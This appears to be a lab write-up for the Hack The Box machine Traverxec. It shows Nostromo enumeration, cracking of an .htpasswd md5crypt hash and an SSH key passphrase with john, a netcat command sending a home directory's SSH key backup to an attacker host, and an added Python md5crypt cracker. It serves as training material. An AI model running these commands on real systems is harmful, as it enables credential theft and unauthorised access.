nostromo
Checking for the web application directory after performing some basic enumeration.
www-data@traverxec:/var$ ll
total 48K
4.0K drwxr-xr-x 5 root root 4.0K Sep 17 03:25 log
4.0K drwxrwxrwt 3 root root 4.0K Sep 17 03:25 tmp
4.0K drwxr-xr-x 2 root root 4.0K Sep 17 03:25 backups
4.0K drwxr-xr-x 9 root root 4.0K Sep 16 2022 cache
4.0K drwxr-xr-x 18 root root 4.0K Sep 16 2022 ..
4.0K drwxr-xr-x 26 root root 4.0K Sep 16 2022 lib
4.0K drwxr-xr-x 6 root root 4.0K Oct 25 2019 nostromo
4.0K drwxr-xr-x 12 root root 4.0K Oct 25 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Oct 25 2019 spool
0 lrwxrwxrwx 1 root root 9 Oct 25 2019 lock -> /run/lock
0 lrwxrwxrwx 1 root root 4 Oct 25 2019 run -> /run
4.0K drwxrwsr-x 2 root mail 4.0K Oct 25 2019 mail
4.0K drwxr-xr-x 2 root root 4.0K Oct 25 2019 opt
4.0K drwxrwsr-x 2 root staff 4.0K May 13 2019 local
Interestingly, the usual www directory is not present under /var. Instead, there is a nostromo directory.
www-data@traverxec:/var$ cd nostromo ; ll
total 24K
4.0K drwxr-xr-x 2 www-data daemon 4.0K Sep 17 03:25 logs
4.0K drwxr-xr-x 2 root daemon 4.0K Oct 27 2019 conf
4.0K drwxr-xr-x 6 root daemon 4.0K Oct 25 2019 htdocs
4.0K drwxr-xr-x 6 root root 4.0K Oct 25 2019 .
4.0K drwxr-xr-x 2 root daemon 4.0K Oct 25 2019 icons
4.0K drwxr-xr-x 12 root root 4.0K Oct 25 2019 ..
I will check both the logs and conf directories.
logs
www-data@traverxec:/var/nostromo$ cd logs ; ll
total 12K
4.0K drwxr-xr-x 2 www-data daemon 4.0K Sep 17 03:25 .
4.0K -rw-r--r-- 1 www-data www-data 4 Sep 17 03:25 nhttpd.pid
4.0K drwxr-xr-x 6 root root 4.0K Oct 25 2019 ..
www-data@traverxec:/var/nostromo/logs$ cat nhttpd.pid
442
The logs directory contains only nhttpd.pid, the PID file of the running nhttpd (Nostromo) instance; no access or error log is kept here.
conf
www-data@traverxec:/var/nostromo/conf$ ll
total 20K
4.0K drwxr-xr-x 2 root daemon 4.0K Oct 27 2019 .
4.0K -rw-r--r-- 1 root bin 41 Oct 25 2019 .htpasswd
4.0K -rw-r--r-- 1 root bin 498 Oct 25 2019 nhttpd.conf
4.0K drwxr-xr-x 6 root root 4.0K Oct 25 2019 ..
4.0K -rw-r--r-- 1 root bin 2.9K Oct 25 2019 mimes
Checking .htpasswd and nhttpd.conf.
.htpasswd
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
The .htpasswd file contains an md5crypt ($1$) password hash for the david user. This was already flagged by PEAS during earlier enumeration.
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ john david.hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (david)
1g 0:00:00:49 DONE (2023-09-17 16:30) 0.02023g/s 214047p/s 214047c/s 214047C/s NsNsNs..Novaem
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
john cracked the password hash for the david user.
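To confirm a crack result without re-running john, the hash can be recomputed offline. The following is an added example, not code from the original write-up: a pure-Python implementation of crypt(3)'s md5crypt ($1$) scheme used to verify the .htpasswd line from the page against a small constructed candidate list. The wordlist and the helper names are assumptions made for the illustration.

```python
"""Offline verification of an md5crypt ($1$) hash, as used in Nostromo's .htpasswd."""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Line copied from /var/nostromo/conf/.htpasswd on the page
HTPASSWD_LINE = "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/"

# Constructed mini wordlist standing in for rockyou.txt (assumption, not from the page)
WORDLIST = ["password", "traverxec", "david2019", "Nowonly4me", "letmein"]


def md5crypt(password: str, salt: str) -> str:
    """Reproduce the FreeBSD md5crypt algorithm behind crypt(3)'s $1$ hashes."""
    pw = password.encode()
    magic = b"$1$"
    salt_b = salt[:8].encode()  # crypt(3) uses at most 8 salt characters

    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    for remaining in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, remaining)])
    bit = len(pw)
    while bit:
        # odd bit: a single zero byte; even bit: first byte of the password
        ctx.update(b"\0" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()

    for i in range(1000):  # fixed 1000-round stretching loop
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()

    out = []
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return "$1$" + salt_b.decode() + "$" + "".join(out)


def parse_htpasswd_line(line: str):
    """Split 'user:$1$salt$digest' into (user, salt, full_hash)."""
    user, stored = line.strip().split(":", 1)
    if not stored.startswith("$1$"):
        raise ValueError("only md5crypt ($1$) hashes are handled here")
    _, _, salt, _ = stored.split("$", 3)
    return user, salt, stored


def check(password: str, stored: str) -> bool:
    """Constant-time comparison of a candidate against the stored hash."""
    _, _, salt, _ = stored.split("$", 3)
    return hmac.compare_digest(md5crypt(password, salt), stored)


def crack(line: str, candidates):
    """Return (user, password) for the first matching candidate, or (user, None)."""
    user, _, stored = parse_htpasswd_line(line)
    for cand in candidates:
        if check(cand, stored):
            return user, cand
    return user, None


if __name__ == "__main__":
    print(crack(HTPASSWD_LINE, WORDLIST))
```

md5crypt has no work-factor parameter: the 1000 rounds are fixed, which is why john reports roughly 200k candidates per second on a laptop and why the hash fell to rockyou.txt in under a minute.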
While this password belongs to the web application's basic authentication, I will test for password reuse against SSH and the local account.
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ ssh david@$IP
The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
ED25519 key fingerprint is SHA256:AbyOr506Yqq/VclZ900M6Ijj6qCoveykzcpc/cuIB14.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.165' (ED25519) to the list of known hosts.
david@10.10.10.165's password:
Permission denied, please try again.
david@10.10.10.165's password:
Permission denied, please try again.
david@10.10.10.165's password:
david@10.10.10.165: Permission denied (publickey,password).
www-data@traverxec:/var/nostromo/conf$ su david
Password: Nowonly4me
su: Authentication failure
The password is not reused for david's SSH login or local account.
nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
Configuration for the web app. Interestingly, home directories are served, with a public sub-directory configured.
homedirs & homedirs_public
- The official Nostromo documentation states that users' home directories are served when the homedirs option is enabled
- A user's home directory is then reachable at <WEBROOT>/~<USERNAME>
- It also notes that access can be restricted with the homedirs_public option, which limits public access to the named sub-directory within the home directory; Nostromo then serves /~<USERNAME>/ from that sub-directory rather than from the home directory itself
There is indeed a page available at the /~david/ endpoint.
Additionally, it shows that the endpoint is a private space.
Since the target Nostromo instance has homedirs_public set to public_www, requests for /~david/ are served out of /home/david/public_www, so the page seen there is that directory's index.html.
The /~david/public_www endpoint is not available, which is expected: the public_www prefix is already applied by the server, so that request would map to a /home/david/public_www/public_www directory that does not exist.
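To make the homedirs / homedirs_public mapping concrete, here is an added model of how the nhttpd.conf above translates request paths into filesystem paths. It is an illustration written for this write-up, not Nostromo's code: the rules follow the documented options (docroot, docindex, the /icons alias, homedirs, homedirs_public and per-directory .htaccess), and the in-memory filesystem is constructed from the directory listings shown on the page. Real nhttpd does far more (methods, MIME types, CGI); only the path logic is modelled.

```python
"""Model of Nostromo's URL-to-filesystem mapping for the nhttpd.conf on the page."""
import posixpath

# Values taken from /var/nostromo/conf/nhttpd.conf on the page
CONF = {
    "docroot": "/var/nostromo/htdocs",
    "docindex": "index.html",
    "aliases": {"/icons": "/var/nostromo/icons"},
    "homedirs": "/home",
    "homedirs_public": "public_www",
    "htaccess": ".htaccess",
}

# Constructed stand-in for the target filesystem, built from the listings on the page.
# Keys ending in "/" are directories (value None); other keys are files.
FS = {
    "/var/nostromo/htdocs/": None,
    "/var/nostromo/htdocs/index.html": "<html>traverxec main site</html>",
    "/var/nostromo/icons/": None,
    "/var/nostromo/icons/dir.gif": "<gif bytes>",
    "/home/david/": None,
    "/home/david/public_www/": None,
    "/home/david/public_www/index.html": "<html>private space</html>",
    "/home/david/public_www/protected-file-area/": None,
    "/home/david/public_www/protected-file-area/.htaccess": "realm David's Protected File Area. Keep out!",
    "/home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz": "<tgz bytes>",
}


def resolve(url_path: str, conf=CONF) -> str:
    """Translate a request path into the filesystem path the server would open."""
    path = posixpath.normpath("/" + url_path.lstrip("/"))  # canonical form for the lookup
    is_dir = url_path.endswith("/") or path == "/"

    if path.startswith("/~"):
        # homedirs: /~user/rest -> <homedirs>/user[/<homedirs_public>]/rest
        user, _, sub = path[2:].partition("/")
        base = posixpath.join(conf["homedirs"], user)
        if conf.get("homedirs_public"):
            base = posixpath.join(base, conf["homedirs_public"])
        fs = posixpath.join(base, sub) if sub else base
    else:
        fs = conf["docroot"] + path
        for prefix, target in conf["aliases"].items():
            if path == prefix or path.startswith(prefix + "/"):
                fs = target + path[len(prefix):]

    if is_dir:
        fs = posixpath.join(fs, conf["docindex"])  # directory request -> docindex
    return fs


def serve(url_path: str, fs=FS, conf=CONF):
    """Return (status, filesystem_path) for a request against the modelled tree."""
    target = resolve(url_path, conf)
    if target not in fs or fs[target] is None:
        return 404, target
    # A .htaccess in the file's directory turns on basic auth; the credentials checked
    # are the global htpasswd entries (david's hash), not anything in .htaccess itself.
    directory = posixpath.dirname(target)
    if posixpath.join(directory, conf["htaccess"]) in fs:
        return 401, target
    return 200, target


if __name__ == "__main__":
    for req in ("/", "/~david/", "/~david/public_www", "/~david/public_www/",
                "/~david/protected-file-area/backup-ssh-identity-files.tgz"):
        print(req, "->", serve(req))
```

Running it shows why the write-up saw what it saw: /~david/ resolves to /home/david/public_www/index.html (the "private space" page), /~david/public_www and /~david/public_www/ both land on a public_www/public_www directory that does not exist, and the tgz in protected-file-area is reachable over HTTP only with david's basic-auth password while being world-readable on disk.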
www-data@traverxec:/$ ll /home/david/public_www
total 16K
4.0K drwxr-xr-x 2 david david 4.0K Oct 25 2019 protected-file-area
4.0K drwx--x--x 5 david david 4.0K Oct 25 2019 ..
4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 .
4.0K -rw-r--r-- 1 david david 402 Oct 25 2019 index.html
However, I can reach and read /home/david/public_www as the www-data user from within the system. /home/david itself is drwx--x--x, so www-data cannot list the home directory, but the execute bit allows traversal into the world-readable public_www sub-directory.
www-data@traverxec:/$ ll /home/david/public_www/protected-file-area
total 16K
4.0K -rw-r--r-- 1 david david 1.9K Oct 25 2019 backup-ssh-identity-files.tgz
4.0K drwxr-xr-x 2 david david 4.0K Oct 25 2019 .
4.0K -rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess
4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 ..
www-data@traverxec:/$ cat /home/david/public_www/protected-file-area/.htaccess
realm David's Protected File Area. Keep out!
The .htaccess only sets the realm name shown in the basic-auth prompt; the credentials actually checked are those in /var/nostromo/conf/.htpasswd, i.e. david's cracked password. The backup-ssh-identity-files.tgz file, which is world-readable on the filesystem regardless of that web-side protection, appears to be a backup of SSH keys.
www-data@traverxec:/$ nc 10.10.14.17 2222 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ nnc 2222 > backup-ssh-identity-files.tgz
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.165] 47728
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ tar -xf backup-ssh-identity-files.tgz
The archive is transferred to Kali over a raw netcat connection and extracted.
SSH
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ tree -a home
home
└── david
└── .ssh
├── authorized_keys
├── id_rsa
└── id_rsa.pub
3 directories, 3 files
The archive contains david's entire .ssh directory, including the RSA key pair and authorized_keys.
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ ssh david@$IP -i home/david/.ssh/id_rsa
Enter passphrase for key 'home/david/.ssh/id_rsa':
The private SSH key is passphrase-protected.
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ ssh2john home/david/.ssh/id_rsa > home/david/.ssh/id_rsa.hash
Converting the private SSH key into a crackable hash using ssh2john.
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ john home/david/.ssh/id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
hunter (home/david/.ssh/id_rsa)
1g 0:00:00:00 DONE 2/3 (2023-09-17 17:03) 25.00g/s 1440Kp/s 1440Kc/s 1440KC/s bond007..pumpkin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
john cracked the passphrase for david's private SSH key.
Now I just need to use it to connect to the target system.